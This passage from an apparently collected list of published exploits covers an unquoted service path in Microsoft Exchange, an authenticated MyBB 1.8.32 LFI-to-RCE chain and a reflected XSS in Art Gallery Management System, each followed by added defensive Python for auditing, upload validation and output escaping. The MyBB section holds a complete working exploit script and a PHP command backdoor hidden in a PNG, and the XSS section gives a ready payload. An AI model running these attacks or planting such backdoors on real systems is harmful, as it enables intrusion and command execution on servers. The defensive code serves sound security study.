"C:\Program Files (x86)\Personify\ChromaCam"
"C:\Program Files (x86)\Personify\ChromaCam\64"
folder or in "C:\", he could place his own "Program.exe" or "PsyFrameGrabberService.exe" files respectively, and when the service starts, it would launch the malicious file rather than the original "PsyFrameGrabberService.exe".
The service starts automatically at boot and runs in system
  23. # Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-01-18
# Vendor : Microsoft
# Version : 15.02.1118.007
# Tested on OS: Microsoft Exchange Server 2019 CU12

# PoC :
==============
```
C:\>sc qc MSExchangeADTopology
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: MSExchangeADTopology
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : Microsoft Exchange Active Directory Topology
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem
```
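Both unquoted-path posts above stop at the `sc qc` output. The following Python is an added example (not part of either advisory) of the audit step a defender runs next: it pulls the image path out of `sc qc` output, decides whether the path is unquoted and contains spaces, lists the file names CreateProcess would try in order, and derives the directories whose ACLs decide whether the issue is exploitable on a given host. The `sc qc` samples are the two quoted above (the Italian label NOME_PERCORSO_BINARIO is the one the Exchange post shows) plus a constructed, correctly quoted service for contrast.

```python
import ntpath

# Constructed samples: the `sc qc` output quoted in the two advisories above,
# reduced to the lines the audit needs, plus one correctly quoted service.
SC_QC_SAMPLES = {
    "PsyFrameGrabberService": r"""SERVICE_NAME: PsyFrameGrabberService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe
        SERVICE_START_NAME : LocalSystem""",
    "MSExchangeADTopology": r"""NOME_SERVIZIO: MSExchangeADTopology
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO            : 2   AUTO_START
        NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
        SERVICE_START_NAME    : LocalSystem""",
    # Constructed: a quoted path with arguments, which must not be flagged.
    "QuotedSvc": r"""SERVICE_NAME: QuotedSvc
        BINARY_PATH_NAME   : "C:\Program Files\Vendor\svc.exe" -k netsvcs""",
}

# Labels `sc qc` uses for the image path in the two locales seen on this page.
PATH_LABELS = ("BINARY_PATH_NAME", "NOME_PERCORSO_BINARIO")


def parse_sc_qc(text):
    """Return the raw image path from `sc qc` output, or None if absent."""
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if sep and label.strip() in PATH_LABELS:
            return value.strip()
    return None


def image_and_args(path):
    """Split an image path into (executable, arguments) as the SCM sees it."""
    path = path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        if end != -1:
            return path[1:end], path[end + 1:].strip()
    return path, ""  # unquoted: the executable boundary is ambiguous


def is_unquoted_with_spaces(path):
    path = path.strip()
    return not path.startswith('"') and " " in path


def candidate_executables(path):
    """Files CreateProcess tries, in order, for an unquoted image path.

    At each space it treats the prefix as the program (appending .exe when the
    prefix has no extension) and the rest as arguments; the full path is last.
    """
    parts = path.strip().split(" ")
    cands = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        cands.append(prefix)
    cands.append(" ".join(parts))
    return cands


def audit_service(name, sc_qc_text):
    """Finding for one service; 'review_dirs' are the directories whose ACLs
    must deny write access to unprivileged users for the path to be safe."""
    raw = parse_sc_qc(sc_qc_text)
    if raw is None:
        raise ValueError("no image path in sc qc output for %s" % name)
    exe, args = image_and_args(raw)
    finding = {"service": name, "image": exe, "args": args,
               "unquoted_with_spaces": is_unquoted_with_spaces(raw),
               "candidates": [], "review_dirs": []}
    if finding["unquoted_with_spaces"]:
        cands = candidate_executables(raw)
        finding["candidates"] = cands
        dirs = []
        for c in cands[:-1]:  # every candidate except the real image
            d = ntpath.dirname(c)
            if d not in dirs:
                dirs.append(d)
        finding["review_dirs"] = dirs
    return finding


def audit_all(samples=SC_QC_SAMPLES):
    return {name: audit_service(name, text) for name, text in samples.items()}


if __name__ == "__main__":
    for f in audit_all().values():
        status = "UNQUOTED" if f["unquoted_with_spaces"] else "ok"
        print("%-24s %-8s %s" % (f["service"], status, f["image"]))
        for d in f["review_dirs"]:
            print("    review ACL on: %s" % d)
```

On a real host the same logic runs over `sc qc` for every service (or over `Win32_Service.PathName`); the fix is to quote the path in the service configuration, and `review_dirs` tells you which directories to check for unexpected write permissions in the meantime.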
  24. # Exploit Title: MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)
# Date: 2023-01-19
# Exploit Author: lUc1f3r11 (https://github.com/FDlucifer)
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1832
# Version: MyBB 1.8.32
# Tested on: Linux
# CVE : N/A
# Detailed Analysis : https://fdlucifer.github.io/2023/01/17/mybb1-8-32-LFI-RCE/

# (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path by changing the Avatar Upload Path to /inc to bypass the blacklisted upload dir.
# (2). After doing that, we are able to chain the "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and the LFI in the "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english.
# (3). These chained bugs can lead to Authenticated RCE.
# (note). The user must have rights to add or update settings and update the Avatar. This is tested on MyBB 1.8.32.
#
# Exp Usage:
# 1. First choose a png file smaller than 1kb
# 2. Then merge the png file with a simple PHP backdoor file using the following commands
#    mac@xxx-2 php-backdoor % cat simple-backdoor.php
#    <?php
#    if(isset($_REQUEST['cmd'])){
#        echo "<getshell success>";
#        $cmd = ($_REQUEST['cmd']);
#        system($cmd);
#        echo "<getshell success>";
#        phpinfo();
#    }
#    ?>
#    mac@xxx-2 php-backdoor % ls
#    simple-backdoor.php test.png
#    mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png
#    mac@xxx-2 php-backdoor % file test.png
#    test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
# 3. Finally run the following command to run the exp script and get the RCE output! Enjoy the shell...
# python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email [email protected] --file avatar_1.png --cmd "cat /etc/passwd"

```python
import argparse
import re

import requests
from bs4 import BeautifulSoup
from requests_toolbelt import MultipartEncoder

r_clients = requests.Session()


def exploit(username, password, email, host, file, cmd):
    # Adding ./inc upload path settings to bypass avatar upload path blacklists
    data = {
        "username": username,
        "password": password,
        "do": "login"
    }
    login_txt = r_clients.post(host + "/admin/index.php", data=data).text
    if "The username and password combination you entered is invalid" in login_txt:
        print("[-] Login failure. Incorrect credentials supplied")
        exit(0)
    print("[+] Login successful!")
    if "Access Denied" in login_txt:
        print("[-] Supplied user doesn't have the rights to add a setting")
        exit(0)

    print("[*] Adding ./inc upload path settings...")
    soup = BeautifulSoup(login_txt, "lxml")
    my_post_key = soup.find_all("input", {"name": "my_post_key"})[0]['value']
    print("[+] my_post_key: ", my_post_key)
    print("[+] cookies: ", r_clients.cookies.get_dict())
    cookies = r_clients.cookies.get_dict()
    data = {
        "my_post_key": my_post_key,
        "gid": 10,
        "upsetting[sigmycode]": 1,
        "upsetting[sigcountmycode]": 1,
        "upsetting[sigsmilies]": 1,
        "upsetting[sightml]": 0,
        "upsetting[sigimgcode]": 1,
        "upsetting[maxsigimages]": 2,
        "upsetting[siglength]": 255,
        "upsetting[hidesignatures]": "",
        "upsetting[hidewebsite]": "",
        "upsetting[useravatar]": "./inc",
        "upsetting[useravatardims]": "100x100",
        "upsetting[useravatarrating]": 0,
        "upsetting[maxavatardims]": "100x100",
        "upsetting[avatarsize]": 25,
        "upsetting[avatarresizing]": "auto",
        "upsetting[avataruploadpath]": "./inc",
        "upsetting[allowremoteavatars]": 1,
        "upsetting[customtitlemaxlength]": 40,
        "upsetting[allowaway]": 1,
        "upsetting[allowbuddyonly]": 0
    }
    modify_settings_txt = r_clients.post(
        host + "/admin/index.php?module=config-settings&action=change",
        data=data, allow_redirects=False, cookies=cookies)
    if modify_settings_txt.status_code != 302:
        soup = BeautifulSoup(modify_settings_txt.text, "lxml")
        error_txt = soup.find_all("div", {"class": "error"})[0].text
        print("[-] modify upload path failed. Reason: '{}'".format(error_txt))
        exit(0)
    print("[+] ./inc upload path settings added!")

    # upload malicious avatar in admin panel
    with open("test.png", "rb") as f:
        image_binary = f.read()
    print("[+] read image successful! ")
    print("[+] image contents: ", image_binary)
    filename = "test.png"
    data1 = {
        'my_post_key': my_post_key,
        'username': username,
        'email': email,
        'avatar_upload': (filename, open(filename, 'rb'), 'image/png')
    }
    m = MultipartEncoder(data1)
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": m.content_type,
        "Origin": "null",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1"
    }
    upload_url = host + "/admin/index.php?module=user-users&action=edit&uid=1"
    upload = r_clients.post(upload_url, data=m, allow_redirects=False, headers=headers, cookies=cookies)
    if upload.status_code != 302:
        soup = BeautifulSoup(upload.text, "lxml")
        error_txt = soup.find_all("div", {"class": "error"})[0].text
        print("[-] upload avatar didn't work. Reason: '{}'".format(error_txt))
        exit(0)
    print("[+] upload malicious avatar png success!")

    # commands exec and get the output, we are done finally :)
    data2 = {
        'my_post_key': my_post_key,
        'file': file,
        'lang': "english",
        'editwith': "..",
        'inadmin': 0
    }
    exec_url = host + "/admin/index.php?module=config-languages&action=edit&cmd=" + cmd
    commands_exec = r_clients.post(exec_url, data=data2, cookies=cookies)
    if commands_exec.status_code != 200:
        soup = BeautifulSoup(commands_exec.text, "lxml")
        error_txt = soup.find_all("div", {"class": "error"})[0].text
        print("[-] command exec didn't work. Reason: '{}'".format(error_txt))
        exit(0)
    cmd_output = re.findall(r'<getshell success>(.*?)<getshell success>', commands_exec.text, re.S)
    print("[+] exec status: ", commands_exec.status_code)
    print("[+] command exec success:\n\n", cmd_output[0])


parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--email', required=True, help="MyBB Admin CP admin's email (easy to find in admin users panel)")
parser.add_argument('--file', required=True, help="the image file name on the server that we uploaded before (easy to find in admin users panel)")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
args = parser.parse_args()

username = args.username
password = args.password
email = args.email
file = args.file
host = args.host
cmd = "id" if args.cmd is None else args.cmd

print(r"""_______________________________________
/ MyBB 1.8.32 - Chained LFI Remote Code \
\ Execution (RCE) (Authenticated)      /
---------------------------------------
       \   ^__^
        \  (oo)\_______
           (__)\       )\/\
               ||----w |
               ||     ||
Author: lUc1f3r11 Github: https://github.com/FDlucifer""")

exploit(username, password, email, host, file, cmd)
```
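The chain above rests on two server-side weaknesses: an avatar upload path setting guarded by a denylist of directory names that `./inc` gets past, and an avatar check that stops at the image data (`file` still reports a valid PNG after `cat simple-backdoor.php >> test.png`). The following Python is an added example of how an upload handler closes both; it is not MyBB code, and WEBROOT, UPLOADS and the 1x1 PNG it builds are constructed for the demonstration.

```python
import posixpath
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, data):
    """Build one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_min_png():
    """Constructed 1x1 RGBA PNG standing in for the post's small test.png."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)
    idat = zlib.compress(b"\x00" + b"\xff\x00\x00\xff")  # filter byte + one red pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed stand-in for whatever gets appended with `cat ... >> test.png`.
APPENDED_PHP = b"<?php echo 'appended'; ?>"


def png_trailing_data(blob):
    """Walk the chunk list and return whatever follows IEND (b'' for a clean file).

    `file` and most image loaders stop at IEND, so appended bytes are invisible
    to them; an upload handler has to look past IEND itself.
    Raises ValueError for anything that is not a well-formed PNG.
    """
    if not blob.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIG)
    while True:
        header = blob[pos:pos + 8]
        if len(header) < 8:
            raise ValueError("truncated before IEND")
        length, ctype = struct.unpack(">I4s", header)
        data = blob[pos + 8:pos + 8 + length]
        crc_raw = blob[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(crc_raw) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        if struct.unpack(">I", crc_raw)[0] != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            raise ValueError("bad CRC in chunk %r" % ctype)
        pos += 12 + length
        if ctype == b"IEND":
            return blob[pos:]


def avatar_is_clean(blob):
    """Accept only a parseable PNG with nothing after IEND."""
    try:
        return png_trailing_data(blob) == b""
    except ValueError:
        return False


# Assumed layout for the example (not MyBB's real paths): the forum lives at
# WEBROOT and the only tree the server may write avatars into is UPLOADS.
WEBROOT = "/var/www/mybb"
UPLOADS = "/var/www/mybb/uploads"


def resolve_upload_path(configured, webroot=WEBROOT, uploads=UPLOADS):
    """Normalise an admin-supplied avatar path and confine it to the uploads tree.

    A denylist of names is what "./inc" bypasses above; resolving first and then
    requiring the result to sit under an allowlisted root rejects "./inc",
    "inc", "uploads/../inc" and absolute paths alike. Returns None on escape.
    """
    full = posixpath.normpath(posixpath.join(webroot, configured))
    if full == uploads or full.startswith(uploads.rstrip("/") + "/"):
        return full
    return None


if __name__ == "__main__":
    clean = make_min_png()
    print("clean png trailing bytes :", len(png_trailing_data(clean)))
    print("polyglot trailing bytes  :", len(png_trailing_data(clean + APPENDED_PHP)))
    for cand in ("./inc", "uploads/avatars", "uploads/../inc", "/etc"):
        print("%-18s -> %s" % (cand, resolve_upload_path(cand)))
```

The path check should also be paired with a web-server rule that never executes scripts from the uploads tree, so that a file which slips past the content check is still served as static data.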
  25. # Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23161

# Proof of Concept:
# 1- Install the application Art Gallery Management System Project v1.0
# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints
# 3- Now insert the XSS payload in the artname parameter. The XSS payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 5- XSS has been triggered.
# Go to this URL "https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E" and the XSS will trigger.
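Both reflected XSS posts on this page (SLiMS in post 21, Art Gallery above) describe the same defect: a query parameter copied into the HTML response unmodified. The Python below is an added example, not code from either project, that decodes the Art Gallery URL as the server would, renders the parameter through a vulnerable template and an escaped one, and checks the result with a real HTML tokenizer instead of string matching; the last renderer is the caveat, showing why escaping alone does not protect an unquoted attribute. The templates are assumptions standing in for the PHP pages.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request URL using the payload the Art Gallery post reports, and
# the string the SLiMS post says was echoed back unmodified.
ART_GALLERY_URL = ("https://localhost.com/Art-Gallery-MS-PHP/product.php"
                   "?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E")
SLIMS_PAYLOAD = "udz21<script>alert(1)</script>rk346"


def get_param(url, name):
    """Decode one query parameter the way the server-side script would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_vulnerable(artname):
    """Reflects the parameter verbatim between tags: the defect both posts describe."""
    return "<h3>Results for %s</h3>" % artname


def render_safe(artname):
    """Same template with HTML-body escaping: angle brackets, ampersand and quotes become entities."""
    return "<h3>Results for %s</h3>" % html.escape(artname, quote=True)


def render_attr_quoted(artname):
    """Attribute context: escaping plus a quoted attribute keeps the value inert."""
    return '<input name="artname" value="%s">' % html.escape(artname, quote=True)


def render_attr_unquoted(artname):
    """The caveat: in an unquoted attribute a space ends the value, so an input
    with no angle brackets or quotes survives html.escape and still adds an attribute."""
    return "<input name=artname value=%s>" % html.escape(artname, quote=True)


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, as a browser would tokenize them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def looks_injected(rendered, allowed_tags):
    """True if the output carries a tag the template did not emit, or any on* handler."""
    parser = TagCollector()
    parser.feed(rendered)
    parser.close()
    for tag, attrs in parser.tags:
        if tag not in allowed_tags or any(a.startswith("on") for a in attrs):
            return True
    return False


if __name__ == "__main__":
    art = get_param(ART_GALLERY_URL, "artname")
    for label, out, allowed in (
        ("vulnerable", render_vulnerable(art), {"h3"}),
        ("escaped", render_safe(art), {"h3"}),
        ("slims escaped", render_safe(SLIMS_PAYLOAD), {"h3"}),
        ("quoted attr", render_attr_quoted("x onerror=alert(1)"), {"input"}),
        ("unquoted attr", render_attr_unquoted("x onerror=alert(1)"), {"input"}),
    ):
        print("%-14s injected=%-5s %s" % (label, looks_injected(out, allowed), out))
```

The tokenizer-based check is what makes the attribute caveat visible: a substring search for `onerror=` would flag the correctly escaped output too, because the harmless text still contains those characters, while the parser only reports an attribute when the browser would actually create one.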